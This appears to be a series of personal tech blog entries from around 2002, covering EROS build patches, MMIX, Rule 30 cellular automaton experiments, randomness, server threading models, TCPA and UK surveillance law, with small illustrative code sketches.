    Wired has a piece on Gene's death. They suggest it's suicide too.

    I pulled my comment that I suspected suicide when the Washington Post text came out and the family said it was an accident. Maybe the family think there's something shameful in it? I'm saddened.

    Salvia - not for the conservatives in our readership.

    Zooko's mail is still mounting up (165 messages now) and the logs are filled with the retries. I've made Zooko a local on metis now - I'll send him the mbox when he's alive again. Unfortunately, since qmail has queued the other 165 as remote it won't deliver them locally. I guess I could point zooko.com to metis in /etc/hosts but I don't want to play about like that. Hopefully Zooko is home soon.

    Airhook looks very cool (read the page for the links at least). It's a TCP replacement protocol with a number of advantages and it can be used as a library using UDP.

    Are capital letters in URLs considered harmful? I have a couple of failed attempts to access the Hitch Hikers text with the wrong capitalisation. Do some things assume lower case?

    A quick congrats to the person with a referer of file:///dev/null (email me!). You are going to send the deep-link protection sites nuts with that! Although the HTTP 1.1 spec says browsers SHOULD provide a way to disable sending Referer headers, I don't know of any that do. Personally I use privoxy which sets the Referer header to match the host name (for crappy anti-deep-link sites).

    I guess that makes me hypocritical since I love reading the weird searches that turn up IV!

    MMIX

    Zooko has been away for ages and his mail server is down. Since IV is the backup MX the queue has been filling for a while and it's now at 101 messages and counting. I've just upped the queue lifetime to 2 weeks to make sure they don't die, but still no sign of Zooko

    Full book: "Are We Spiritual Machines?" posted by Kurzweil. Also available in dead-tree format.

    An old (1993) talk by Vernor Vinge about the Infosingularity.

    When Knuth wrote the Art of Computer Programming he used a fictional assembly language to do the examples in, called MIX. Well, MMIX - the 64-bit updated version of MIX - has been around for a while. You can get the documentation here

    Well, someone has ported GCC to MMIX and it works pretty well. Grab the latest GCC 3.1 and binutils 2.12.1 and build gcc with the --target=mmix option to configure and it all goes swimmingly.

    Not sure why you would want to do this, but it works

    # 1 "test.c"
    ! mmixal:= 8H LOC Data_Section
    	.text ! mmixal:= 9H LOC 8B
    	.p2align 2
    	LOC @+(4-@)&3
    	.global main
    main	IS @
    	SUBU $254,$254,8
    	STOU $253,$254,0
    	ADDU $253,$254,8
    	LDOU $253,$254,0
    	INCL $254,8
    	POP 0,0
    
    	.data ! mmixal:= 8H LOC 9B
    	
    Problem class 50

    I think I need some simple project to code on. Either helping with an existing one or something nice and short term that I can see the end of. (or someone could give me a real job - heh, yea right).

    All my ideas are far too far out and I keep cycling. At one point I'm thinking that I'm nuts and will never manage any of what I'm planning so I cut the plan down hugely. Then I start thinking and designing and pretty soon I'm right back to where I started, by a different path.

    This is getting really annoying because, by the time I'm at the `cut it all back' point I'm planning a Turing-capable AI.

    Landscape (there is a page for Landscape in the sitetree - but it sucks) merely involves:

    • Implementing a dynamically typed, safe language which is incrementally compiled at almost every key stroke with a GUI which highlights errors as you type them and can construct proofs of the code, on-the-fly
    • Building a virtual machine for the language to target which maps the disk as a huge single-level store (SLS) of persistent objects which have an `in memory' format (EROS style).
    • (this VM (which is a MMIX machine, by the way) is capable of running programs backwards for debugging with the aid of a store journal. This, of course, ties in perfectly with the language GUI)
    • Ripping out everything, to the level of replacing the consoles etc, with code written for the VM, which all runs as a single process (it's a safe-language, remember?) and can access the SLS
    • The SLS contains Xanadu style, super linked objects of everything and code is just another object. Basically a fully object orientated system where, say, an email object would have From links to a Person object, which would have links to all the emails from and to that person, their PGP key etc

    And that's a sane idea by my standards!

    Oh crap

    Gene Kan has died. I feel...

    Gene Kan has died. I feel a little ashamed for missing it, but everyone seems to have. I'm sorry Gene.

    [link1] [link2] [link3] [link4] [link5]

    Still no solid word on how such a young and healthy guy passed away.

    Update: added a fifth link, which says it was an accident

    Evas2

    Quoted in another New Scientist article. This one doesn't link to IV unfortunately.

    Very good text on the up-and-coming 64-bit chips: POWER4 and Itanium2. (The author discounts Hammer, which is a shame because I like it from what I've heard.)

    Seth Schoen has more notes on Palladium. [via Wes]

    Seems the Earth will expire by 2050. I wonder if we hit info-singularity before we all die out?

    RAVE Act: Reducing Americans' Vulnerability to Ecstasy. Sometimes I plain just don't get the USA. I guess a whole multitude of factors just increases the wanker/square meter count there.

    Seems that all the new Evas work is going into evas2, which rasterman pointed me to. My UTF8 support is already in there (and it means I don't have to patch Imlib now).

    Evas2 seems to be a lot cleaner code but it's not as mature at the moment. For one, deleted objects don't actually disappear, which makes for some interesting effects to be sure. The API naming is a lot cleaner though, it now has consistent noun-verb style everywhere.

    Raster asked why his Japanese ttfs didn't work with UTF8. It seems that they map their characters into the Latin-1 region rather than their Unicode regions. I have no idea why. I suppose there must be some old encoding which they are using for when everything was ASCII.

    JWZ's calendar

    JWZ was asking how to fix the sidebar in his calendar (read the LJ post for the full specs). I suggested that he could hide CSS from NS4 and IE3 by putting it in a @media screen block - which works really nicely.

    Except that in order for NS4 to render it correctly you have to put the fixed sidebar in a table. This breaks konqueror unfortunately, which doesn't render the sidebar at all. Damn NS4.

    IOI

    Janis Ian on music copyright. Nope, I've never heard of her either but it's a good text (even if it is preaching to the choir here).

    Sunshine Project on biological weapons.

    IRC chat with Ray Kurzweil and Vernor Vinge.

    I have dates for flying to S. Korea now (16th and 25th of August) so I ambled down to my GP today for any injections that I need. Seems I only need Hep A and the needle wasn't too bad. (I don't like needles).

    (yes, Ian (if you read this) that means I can't make your party - sorry!)

    Also Lionhead, the sponsors of the UK IOI team, have offered me a job for the summer. I kind of wanted to stay around this year, but since my other job prospects are somewhat, erm, crap, I might take it up.

    TrueType fonts

    Added UTF8 support to Evas today. (Evas is the Enlightenment canvas). Unfortunately the ALPHA_SOFTWARE backend uses Imlib to render text, so I have to add UTF8 support to that too.

    Thankfully, the M$ core fonts (one of the few good things ever to come out of That Company) have a Unicode table in them. Wrote ttfdump to display the code points in a given font and some of the M$ fonts have a scattering of U2200 glyphs (the maths symbols). Unfortunately, Wolfram's maths fonts put all the glyphs in the private use area, prat.

    Searching Gnutella networks

    Bram flames Ted Nelson

    Emacs mode for M$ Word

    Will Knight pointed me to this paper on searching Gnutella networks. Some commentary:

    The motivation for this metric is that in P2P systems, the most notable overhead tends to be the processing load that the network imposes on each participant.

    The processing load is their most notable overhead? They must have one hell of a bandwidth or be really bad coders.

    If a PC has to handle many network interrupts when it joins the P2P network, the user will be forced to take the PC off the P2P network to get "real" work done.

    Because of interrupt load? I'm wondering if this paper has been translated from another language. Once again, the limiting factor is bandwidth and certainly not interrupts.

    Other than that odd misunderstanding the rest of the paper is very good. Some points:

    • Walkers don't find uncommon documents

    Unstructured networks fail to find uncommon documents generally, but walkers are very bad at it. Consider a million node network where a document only exists on one node. With 64 walkers, state keeping and an average of 1 second for a hop, you are looking at over 4 hours search time.

    Not to mention that the suggested `talk back' limit of once per 4 hops would generate 16 packets a second to the searcher; enough to take up a notable chunk of a modem's bandwidth.
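    The arithmetic behind those two figures, as a quick Python sketch. It assumes the worst case, where the 64 walkers between them have to visit every one of the million nodes exactly once (that is what the state keeping buys you), and that each walker reports back once every 4 hops. The function names are just for illustration.

```python
NODES = 1_000_000
WALKERS = 64
SECONDS_PER_HOP = 1.0
HOPS_PER_TALK_BACK = 4

def worst_case_search_seconds(nodes, walkers, seconds_per_hop):
    """Time for the walkers to cover every node once, sharing the work evenly."""
    return nodes / walkers * seconds_per_hop

def talk_back_packets_per_second(walkers, hops_per_talk_back, seconds_per_hop):
    """Packets per second arriving at the searcher from all walkers combined."""
    return walkers / (hops_per_talk_back * seconds_per_hop)

search_hours = worst_case_search_seconds(NODES, WALKERS, SECONDS_PER_HOP) / 3600
packets = talk_back_packets_per_second(WALKERS, HOPS_PER_TALK_BACK, SECONDS_PER_HOP)
print(f"{search_hours:.2f} hours, {packets:.0f} packets/s")  # 4.34 hours, 16 packets/s
```

    On average the document turns up about halfway through the sweep, which is still a couple of hours.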

    • Reason why random placements are better

    The paper also suggests random replication without considering why. I would hazard a guess of the following:

    Random walkers are going to tend to end up at the well connected nodes in a power-law network and hang around there. Thus path replication will hit the high order nodes, while random replication (as they define it) will tend to hit more low order nodes. I would suspect that measuring the number of copies in the network would show that random replication gives the highest number.

    • Random networks don't work

    The paper also suggests that networks should be random. This is very nice but not all nodes are created equal and those on a T1 line can handle more messages per second than modem users. This bandwidth inequality (and the distribution of bandwidth) will force a power-law network to some extent.

    • It's not anonymous

    Well documented, but I'm just pointing it out.

    Greedy people scheme:limi...

    Greedy people scheme:
    limit freedoms for profit.
    Resistance prepares.

    Orwell on the decay of the English language. Still relevant, if not more so.

    MI5: "Civil liberties are a Communist front" (1951)

    Started reading through JWZ's rants last night while waiting for CSI to come on. About 2/3 of the way down now.

    EuroPython presentations ...

    EuroPython presentations [via Lambda]

    Note on Coding Theory [via Raph]

    e-lang has a great thread...

    e-lang has a great thread on TCPA/Palladium. See, for example, this message.

    I would quite like to switch to using EROS but I'm too lazy really. I have a spare 20GB IDE drive bolted into my case which isn't even powered at the moment. Maybe I should download it and give it a go.

    Building EROS

    Ryan Lackey has written a long post about TCPA to the cypherpunks list. Ryan:

    This feels rather unfulfilling. I even avoided posting it to other lists so as to limit the spread of crack and confine said crack to its standard resting place.

EROS doesn't exactly build cleanly and I don't know if my fixes break anything critical yet, but they do get the code to compile at least.

(the EROS install page is here)

Patch One

--- Makefile	Wed Jul  4 19:15:29 2001
+++ Makefile	Sun Jun 30 18:36:31 2002
@@ -103,7 +103,8 @@
 XENV_LIBXML2 =  libxml2-2.3.13
 XENV_LIBXSLT =  libxslt-0.13.0
 
-XENV_TOOLS = xenv-make xenv-binutils xenv-gcc xenv-libxml2 xenv-libxslt
+#XENV_TOOLS = xenv-make xenv-binutils xenv-gcc xenv-libxml2 xenv-libxslt
+XENV_TOOLS = xenv-binutils xenv-gcc xenv-libxml2 xenv-libxslt
 
 xenv: $(XENV_TOOLS)
 
@@ -120,12 +121,6 @@
 	-rm -rf build
 
 xenv-binutils:
-	-rm -rf build
-	-mkdir build
-	cat pieces/$(XENV_BINUTILS)/tgz-part.* | $(ZCAT) - | (cd build; tar xf -)
-	(cd build/$(XENV_BINUTILS); ./configure \
-			--prefix=$(EROS_XENV) \
-			--target=$(EROS_TARGET)-unknown-linux)
 	$(MAKE) -C build/$(XENV_BINUTILS) all install
 	@echo
 	@echo "BUILD SUCCEEDED... removing build subdir"

Patch Two

--- bfd.h	Sun Jun 30 19:16:33 2002
+++ bfd.h	Sun Jun 30 19:16:21 2002
@@ -98,7 +98,7 @@
 #define TRUE_FALSE_ALREADY_DEFINED
 #endif /* MPW */
 #ifndef TRUE_FALSE_ALREADY_DEFINED
-typedef enum bfd_boolean {false, true} boolean;
+typedef enum bfd_boolean {FALSE, TRUE} boolean;
 #define BFD_TRUE_FALSE
 #else
 /* Use enum names that will appear nowhere else.  */

Final exam finished this ...

Final exam finished this afternoon. Hung up my blazer for the last time. This feels weird.

On the upside looks like I'm a tech reviewer for the new edition of UNIX Power Tools.

Gun crime up 49% and this...

Gun crime up 49% and this is since we banned handguns. I'm sure ESR would have something pro-gun to say about this, I'm not going to.

Those CA results are rubbish past 8 bits. It was a 1 char typo in the code which I'm happy about because they make sense now. Maybe some more analysis soon

Been working on a secure version of GRUB which keeps checksums on a write protected floppy and won't boot a trojan kernel. It will also check any number of other files before booting (say /sbin/init and friends). Working pretty well
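The checking step is simple enough to sketch in a few lines of Python. This is only an illustration of the idea and not the GRUB code itself: the hash function (SHA-256 here), the manifest format (a dict of path to expected digest, standing in for the list on the write protected floppy) and the function names are all assumptions.

```python
import hashlib

def sha256_of(path):
    """Hash a file in chunks so large kernels need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def failed_checks(manifest):
    """Return the paths whose contents are missing or differ from the manifest.

    `manifest` maps a file path to its expected hex digest.
    """
    bad = []
    for path, expected in manifest.items():
        try:
            ok = sha256_of(path) == expected
        except OSError:
            ok = False  # an unreadable file counts as a failure
        if not ok:
            bad.append(path)
    return bad
```

A boot loader built this way would refuse to continue unless `failed_checks` came back empty.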

Ian Hill gets a submission on /.

Metis (this box) got a nice update over the last couple of days. Switched from apache to publicfile on the internal interface, bind to tinydns for the DNS server and installed gr

A NewScientist story linked to imperialviolet.org . Thanks Will. (Will Knight is one of only 2 clueful journalists I've ever talked to. The other being Andrew from theregister).

Rule 30

I'm troubled

Thinking about the CA results from yesterday I'm pretty convinced that I'm doing something silly. I verified the results for 3 bits by hand and it all came out right. But still, it makes a mess of my thinking and I want those results to be wrong.

I'll go over the code again at some point

OpenSSH

Wes doesn't like the way Theo is handling the latest OpenSSH bug. What would you do differently, Wes?

If Theo says "here's the fix" it's then a rush between sysadmins and blackhats as to which gets to a host first. sshd cannot be chrooted or run as non-root so all cracks are total and you're looking at a reinstall. Privsep isn't really ready for the prime-time but it does make people mostly immune without revealing the bug (though with the added focus people won't be long in finding it independently). It's a bad situation, but Theo is handling it well.

SSH Remote Exploit. All u...

SSH Remote Exploit. All upgrade to OpenSSH 3.3 (see this for Debian)

Maximum of 44 outputs for CAs up to 27 bits now confirmed. (Which means that 25 and 27 have 44 outputs since the number cannot go down.) I don't expect to finish processing 29. I don't think the answer would be a shock anyway.

IBM laptops get TCPA chips. Now the chip actually sounds a little useful:

The chips, known as Trusted Platform Modules, generally include a 16-bit microprocessor, a random number generator, hashing capabilities and a significant amount of non-volatile memory. Among the security features TPMs provide are an ability to generate and securely store digital certificates and private keys on-chip, hardware support for multiple authentication schemes and the encryption/decryption of files on demand.

If they weren't fuckware chips it could be a good thing. As it is...

Forgot to upload Gilmore's essay. Fixed.

More on Rule 30

Been playing about with Rule 30 CAs (see ANKOS page 53). You might want to read Sunday's post first (if you have not already).

As I said, Rule 30 CA seems to map very regular numbers onto odd sequence numbers. The lack of type A randomness in the input number and the presence of it in the output data, gives rise to seeming `added complexity'.

Today I'm taking a look at that mapping.

The input to the CA is the starting line expressed as a number. A black block is a 1, white is 0. The input size is always odd. The output is the first n bits down the centerline (not including the bit from the starting line). For example

A Rule 30 CA

That is a size 3 CA with starting value 5 (101 in binary). The centerline is down the middle (the white column) and the result is 1 (001 in binary).

Now we can cycle through all the possible input values for a given size and record the output. Rather than give a huge table I've taken a tally count of the outputs and plotted output value against count
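A minimal Python sketch of the procedure, for anyone who wants to reproduce the tallies. The boundary handling is an assumption: cells outside the starting line are treated as white and the pattern is allowed to grow outwards, which at least reproduces the size 3 example (starting line 101 gives 001). The most significant bit is taken as the leftmost cell, and the function names are made up for illustration.

```python
from collections import Counter

def rule30_centerline(start, size):
    """Return the first `size` centre-column bits below the starting row, as an integer."""
    if size % 2 == 0:
        raise ValueError("size must be odd so that there is a centre column")
    pad = size  # the pattern grows one cell per step on each side
    width = size + 2 * pad
    row = [0] * width
    for i in range(size):
        # most significant bit of `start` is the leftmost cell
        row[pad + i] = (start >> (size - 1 - i)) & 1
    centre = pad + size // 2
    out = 0
    for _ in range(size):
        new = [0] * width
        for j in range(width):
            left = row[j - 1] if j > 0 else 0
            right = row[j + 1] if j < width - 1 else 0
            new[j] = left ^ (row[j] | right)  # Rule 30: left XOR (centre OR right)
        row = new
        out = (out << 1) | row[centre]
    return out

def tally_outputs(size):
    """Count how many starting values of `size` bits map to each output value."""
    return Counter(rule30_centerline(s, size) for s in range(2 ** size))
```

`len(tally_outputs(n))` is then the number of different outputs for n bits of input. If the original runs used a different edge rule (wrapping around, say) the counts will differ.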

[Figure: results from a rule 30 run with 5 bits of input]

[Figure: results from a rule 30 run with 7 bits of input]

[Figure: results from a rule 30 run with 9 bits of input]

[Figure: results from a rule 30 run with 15 bits of input]

We can certainly see that the mapping is not one way. In fact there are very few possible output values and all the inputs map to a small number of possible outputs. The maximum count in each case is 2^{n-3} + 2^{n-2} (where n is the size of the input in bits).

The number of different outputs is also noteworthy. It has a maximum of 44 up to 23 bits of input. (Of course it gets quite time consuming to run tests with greater than 23 bits of input.)

[Figure: size of input (x) vs number of different outputs]

I don't have any conclusions at the moment, but at least I would be worried about using Rule 30 CAs as random number generators given that all the seeds seem to map to (at most) 44 sequences

Cool! I'm on Ryan's LJ fr...

Cool! I'm on Ryan's LJ friends list. Now if only he posted weird and wonderful stuff in friends only posts

A few more scans from the prom. (photos from weezel)

toad.com is dead so I've posted a local copy of John Gilmore's great essay "What's wrong with copy protection" since some people might need the anti-memes for this

Given the price of flights to LV I'm not going to make DefCon 10 this year. I might well go down to the UKUUG exhibition though. Anyone want to meet up? Mail me.

Wolfram and Randomness

Some thoughts on randomness, not structured yet...

Define:
Cryptographic Randomness (type A): The lack of patterns in a sequence
Chaitin Randomness (type B): The inability to express a sequence in a short program

You may wish to read up on the latter

Now, sequences that are type A are used all the time, most explicitly in cryptography. If I run an RC4 cipher with a random key I can generate megabytes of data that will pass type A tests. However, you can certainly code RC4 in less than a megabyte of data on a reasonable UTM. And even if you couldn't do it in less than a meg you can just generate more RC4 data. Thus my type A random sequence is not very type B.
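To make that concrete, here is RC4 as a short Python sketch (the function name and the example key are mine). The whole generator is about a dozen lines, yet it will happily emit a megabyte of output, so the output's shortest description is at most "this program plus the key".

```python
def rc4_keystream(key, n):
    """Return the first n bytes of the RC4 keystream for `key` (bytes)."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):  # output generation
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)

if __name__ == "__main__":
    stream = rc4_keystream(b"Key", 1_000_000)
    print(len(stream), "bytes from a program far shorter than its output")
```

(RC4 is here only because it's the example in the text; it has known biases and shouldn't be used for anything new.)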

Now sequences that aren't type A random almost certainly aren't type B. I don't have anything like a proof for this yet, but it seems sensible. However, I don't think you can ever prove that you have the shortest program that will generate a given sequence without brute-forcing all programs up to that length. I think the proof for that is in this paper, but I need to reread that as I haven't looked at it for ages

So, given the set of all sequences of length n some will be type A and some of those will be type B random (both of those lines are fuzzy, but I don't think that matters right now). Assuming you can find the shortest program that generates each of those sequences you can reinterpret each of those programs as numbers and give each member of the set a number (and thus an order). Some sequences will have shorter numbers than others and if we generated every possible program in length order we would expect to see outputs in roughly the same order as our ordered set.

Now, this is where Wolfram's sequences come in. Mathematica's random function actually runs a rule 30 CA and uses the values of the center line as random data. This gives type A randomness (so he says). However, what he's calling complexity in ANKOS is type A randomness and `his' (pompous twit) `complexity generating' CAs are simply low numbered members of the set of sequences.

Like I said, that was just me writing stuff down to see what I'm thinking

Back to our regular schedule

I wonder if we can expect some really fat, high profile, Americans to be defined as enemy combatants and detained without trial now?

Another just links day, t...

Another just links day, though I'm kind of free of exams now

Oh look, linking to this site without permission is prohibited. Oh well - kiss my arse. Wired article (which links to NPR, so is that link banned too?)

Links today because...

Links today because I'm feeling a little shot (and it's only going to get worse). I have some ideas about Wolfram/cryptographic randomness/Chaitin randomness which are starting to come into focus but I'm not sure if there's actually anything there yet

I had to write about Creationism today in GS exam (that page could have been useful yesterday - oh well). My hand hurts now after 3 hours of writing. I'm a maths person, I don't do lots of writing! (On the upside I found that I have pretty funky capital letters)

We Win!

We Win! [and the Guardian]

This looks like it might be interesting (read the press release)

Good text on refuting Creationism crap from SciAm. SciAm was one of the offenders who broke links when I checked, but given the URL of this page I'm hoping it's a little more permanent.

Been checking the old arc...

Been checking the old archive pages with the W3C link checker. Not too bad, thou it seems that Dilbert and SciAm break their links after a while. It also tells you when you've missed a / on the end of a URL which saves a redirect at least.

The RIPX delay made it on the number two slot on PM (the news show on Radio 4, if you're not British don't worry). That's coverage.

Someone emailed me about Xchat code, which I haven't touched in ages. Seems someone was a little `feature optimistic' with the documentation and so I wrote a patch to bring the code up to what the documented behaviour was. It's weird reading code that I wrote years ago, but it actually made a lot of sense. Reminded me of how much C sucks for a lot of stuff, but at least the code wasn't as bad as I thought it was going to be, considering I must have been about 15 then.

Well, there's a Backlink ...

Well, there's a Backlink of the Day bar now. It's not really `of the day' as such - I grep them out of the logs by hand but it will do for the moment. Coincidentally, Keith is talking about implementing backlinks as well today.

The two Google links above show one of the problems at the moment. In one case Google is linking to the text of Fear and Loathing which is fine because that's on a static page. However, the other is linking to a blog entry on the front page which long ago fell off the bottom.

In the Google case you can view the cached version of the IV frontpage, but in the general case the Referer header generated from people clicking links off the frontpage will be http://imperialviolet.org, not http://imperialviolet.org/page4.html#e72. We need some way to tell the browser what the source of a link should be.

Unfortunately, we cannot just add tags or attributes to existing tags without all the validators going nuts. That either leaves trying to get a change through the W3C (ye gods!), overloading some existing operator or hiding it in comments. None of those solutions are much good - anyone have any better ones?

Guess who forgot to actua...

Guess who forgot to actually upload the Syncthread paper. Oops. (Well done to all the people who emailed me about that - that would, erm, be no one despite all the attempts to get it in the logs!)

Stand have announced that the debate over the RIPX order has been delayed until Monday the 24th (not Tuesday the 18th, like /. said - that's when it was going to be). Stand also have a neat little banner ad which is now floated on the top right of IV.

A New Germ Theory [via ES...

A New Germ Theory [via ESR] about how many conditions (such as cancer, heart disease and even homosexuality) are infectious because, if they were genetic, they would be selected against so strongly as to disappear. Well worth the (quite long) read.

What I said this morning (it's just below this - read it first) is backwards. We don't need a way of marking sections as "this stuff is actually someplace else", we need inline linking (like <img> tags put content inline). This is nothing new - Ted Nelson told us all this years ago.

Very cool CSS [via Keith]...

Very cool CSS [via Keith]. This is pretty much a mozilla only zone, konqueror doesn't stand up to much here, but there are some mangled versions of the pages for IE users. It would be cool to use some of this kind of CSS on IV - but it would cripple it for most viewers. Having the tree structure as a CSS menu would be so funky I might just do it anyway.

With an eye to some backlinking on IV I tried to find a simple webserver that would log Referrer headers. Apache is far too big to use unless you really have a need for it (PHP etc), thttpd looks just right, but as soon as you switch to logging to a file it doesn't log referrers! Aggh!

In the end it only took about 5 minutes to hack up the One True Webserver to log referrers anyway, so that's what I'm running now

J for C Programmers

Four entries today and counting. Partly I'm catching up from when IV was down this week but mostly it's because if I start coding anything I know that will be the afternoon gone and I really should revise Biology

This was posted to LtU this week. I've read about 1/4 of the way through, which covers all the basic ideas in J and the builtin operators.

It's a very interesting language and quite cleanly based around the idea of multi-dimensional arrays for everything. However, like most pure languages its range of applications is quite limited and it also suffers from being in the Perl family of function naming. In fact it's worse than Perl in that regard, J is more like K.

However, I do recommend that people read the beginning of the book and grok the concepts of the language about implicit loops.

More on ANKOS

Keith links to a discussion on A New Kind of Science. Most of the opinions there seem to follow my own quite closely.

For you Mozilla users the...

For you Mozilla users there is now a CSS tree at the top of the root page (in addition to the old-style tree at the bottom). It's a little buggy, sometimes it doesn't seem to fold away right and sometimes moving down to open a different branch changes the tree so that you select something else. It's a start thou

Later On: Removed it - just looks silly in a browser which doesn't support it

Asynchronous Behaviour

Raph and Dave McCusker have been talking a lot about how to design servers recently.

I played around with these ideas a lot during Whiterose development and my views might be a little clouded because Whiterose isn't a typical network server (the Freenet protocol is far more complex than most). During Whiterose development I settled on syncthreading as a good model for managing state. This text gives a good overview of syncthreading (by my definition). It was written as a technical report for Uprizer, but since it says nothing about Uprizer specifically I doubt they have a problem with my making it public

Now, the SEDA people have a good paper with some neat graphs of throughput with threaded and event based models which certainly suggest that no one should consider writing threaded servers if they want it to scale.

However, threaded systems (certainly syncthreaded ones) are event based. They're fundamentally the same thing.

With an event system you loop over your input queue call (be it select, poll, kqueue etc) and, for each event, feed the event into the finite state machine (FSM) for that transaction. The FSM makes some quick, non-blocking, change in its state and returns. Repeat.

The only difference with a threaded model is that the FSM is a stack and some registers. You still feed the event into the FSM and it still returns quickly. If you have syncthreads you are doing this explicitly, otherwise the kernel is doing it for you. (if you don't get what I'm saying here, read the Syncthreading paper and come back).

In an ideal world the FSMs would be fully self contained and so it wouldn't matter if they were updated at the same time (e.g. preemptive threads). Sometimes, however, they have to interact because the protocol requires it. In this case there is a fundamental difference between preemptive threads and most event-based designs.

So, given that one caveat, if you are saying that threaded systems are slower, or have less throughput etc you are really complaining about the quality of your threading system.

Why I support syncthreading

Given that I've just said that syncthreading and event-models are, basically, the same - how can I say I support syncthreading?

Simply because the FSMs are so much nicer to code as threads when they are anything more than the most basic systems. Threading basically loads and saves your state for you (while event models make you update structures manually) and threading lets you have state encoded in the program counter. A linear progression of states is written as a linear progression of statements and loops of states are written as loops in the code. It's just so much easier to work with.
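Here is a toy illustration in Python. This is not Whiterose code and the two-step "protocol" is made up: the first event is a name, the second is a count, and the reply is the name repeated that many times. A Python generator stands in for a syncthread, since it is also a stack frame that gets suspended and resumed explicitly.

```python
class EventFSM:
    """Event style: the state lives in fields that we update by hand."""
    def __init__(self):
        self.state = "want_name"
        self.name = None

    def feed(self, line):
        if self.state == "want_name":
            self.name = line            # save state manually
            self.state = "want_count"
            return "count?"
        elif self.state == "want_count":
            self.state = "closed"
            return " ".join([self.name] * int(line))

def thread_style():
    """Thread style: the same states are just positions in the code,
    and `name` is an ordinary local variable."""
    name = yield             # wait for the first event
    count = yield "count?"   # reply, then wait for the second event
    yield " ".join([name] * int(count))

def run(events):
    """Feed the same events to both, as a select/poll loop would."""
    fsm, gen = EventFSM(), thread_style()
    next(gen)  # run the generator up to its first wait
    return [(fsm.feed(e), gen.send(e)) for e in events]

if __name__ == "__main__":
    print(run(["agl", "2"]))
```

Both halves return quickly from every event and give the same replies; the only difference is who keeps track of where we are. With two states it hardly matters, but add a loop or an error path and the explicit version starts to sprawl.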

Whee! Imperialviolet.org ...

Whee! Imperialviolet.org lives! Xia went down and looks dead - and it unfortunately hosted the DNS for imperialviolet.org. Much thanks go to Schvin for DNSage from now on. I still have a slight hope of getting netsol to recognise metis as a nameserver thou.

Time has been all taken up by exams, so not much to tell from looking at my bookmarks (which are spanning both monitors again - sure sign that it's time to organise them).

Oh, and the letter I sent to my MP

<AccordionGuy2> "Man in the Middle" -- protocol porn.
<GabeW> leave it to #infoanarchy to turn crypto kinky

When the RIP act was passed...

Oh fuck. When the RIP act was passed dear Mr Straw bleated repeatedly about how careful the control was going to be and how tight the safeguards would be for spying on people. Now what do we have?

"expanded to include seven Whitehall departments, every local authority in the country, NHS bodies in Scotland and Northern Ireland, and 11 other public bodies ranging from the postal services commission to the food standards agency."

The Food Standards Agency?? And this comes as a government aide has to apologise for investigating a member of the Paddington Survivors group because they might be against government policy.

As a first step, your goal, dear reader, is to try and get TLS installed on your MTA today. It's only a small step, but it's pretty simple (qmail, Debian Exim, Exim, Postfix).

Send an email to me (via TLS/SMTP of course) and get your name on a roll call of fame. Guess whose MTA has been TLS enabled for ages?

E7l3 discusses A New Kind...

E7l3 discusses A New Kind of Science today. As I'm a little further into it it has got a lot better - mostly because Wolfram has stopped talking about how wonderful he is.

Lots of new stuff on LtU. When it rains, it pours (certainly true of the weather today)

Seattle Times article [via Bram] talking about how `public domain' means almost nothing in US legal terms and a little about BitTorrent.

Old Story about Australia abusing spying powers. More reason why people should be very worried about what Europol wants to spy on (mentioned here before).

Like I said, a lot of projects are long term solutions to this and, in thinking about it, I must admit that I keep designing some manic things. (I'm not ready to throw them out yet). As a start I'm looking at overlay networks and the performance of TCP over different connections with a view to creating a Crowds-like network. While I'm at it, it would be nice if the overlay network could make NATed and firewalled hosts first-class peers.

In order to play about with TCP I've set up a quick program that uses the tun/tap device to simulate a link with a given bandwidth, latency and packet loss. I might post the results here if there's anything worth noting.
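The model behind such a simulator is small. The sketch below is not the tun/tap program itself (it touches no network devices); it only shows the arithmetic, with made-up names and the assumptions that the link sends one packet at a time, the queue is unbounded and loss is independent per packet.

```python
import random

def simulate_link(packets, bandwidth, latency, loss, seed=0):
    """packets: list of (send_time_s, size_bytes), sorted by send time.
    bandwidth is in bytes/second, latency in seconds, loss a probability.
    Returns the arrival time of each packet, or None if it was dropped."""
    rng = random.Random(seed)
    link_free_at = 0.0
    arrivals = []
    for send_time, size in packets:
        start = max(send_time, link_free_at)     # queue behind earlier packets
        link_free_at = start + size / bandwidth  # time to put it on the wire
        if rng.random() < loss:
            arrivals.append(None)                # dropped in transit
        else:
            arrivals.append(link_free_at + latency)
    return arrivals

if __name__ == "__main__":
    # Two 1000-byte packets sent together over a 1000 byte/s, 500ms link.
    print(simulate_link([(0.0, 1000), (0.0, 1000)], 1000, 0.5, 0.0))
```

A dropped packet still occupies the link here, i.e. it is lost after being sent rather than before; whether that matches a given real link is another assumption.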

However, exams are taking first place in my scheduling now

On Computers and the Evil...

On Computers and the Evils Of Powersaving

Went into school yesterday to start up everything and to fit a UPS on metis. Unfortunately I didn't compile the kernel with serial support (minimal and all that) so I'll have to reboot metis on Monday with a newer kernel. Good excuse to switch to 2.4.18 thou.

I also took marvin (the laptop) in with me and let it feed off the 2Mbps connection. It's now a fully up to date Debian unstable with 2.4.18 etc. I also finally got both my PCMCIA cards working. The 3Com network card was fine under 2.2.17, but the Aironet didn't work at all.

In comes 2.4 and both of them break. It turns out that the 3c575 driver has been replaced with 3c59x which has hotplug support (meaning it can handle the PCMCIA card without cardmgr or any of the rest of the pcmcia-cs tools). The airo drivers, however, do need pcmcia-cs and only the latest will do. Anyway - it's all working now.

Since I have an Aironet but no other 802.11b devices I set ethereal sniffing wifi0 and walked into town to pick up a book (more on that later). The Aironet is, as I understand, the best card for sniffing since it can do RFMON (multiple frequency sniffing I think). But the laptop went into power saving (which I expected) and powered down the PCMCIA bus too (which I didn't), so I got nil packets. Oh well.

A New Kind of Science

The book I was picking up was A New Kind of Science, which has finally reached this country. And thanks to Anna Gregson who came up to me in town and just gave me 30 pounds, thus neatly paying for nearly all of the book. I wish more stunning ladies would do stuff like that

I've only read the first couple of chapters but so far Wolfram is being a pompous twit. He spends a lot of words talking about how he is the first person to recognise that complexity can come from simple structures and how he is the first person to study it.

Doesn't exactly ring true does it?

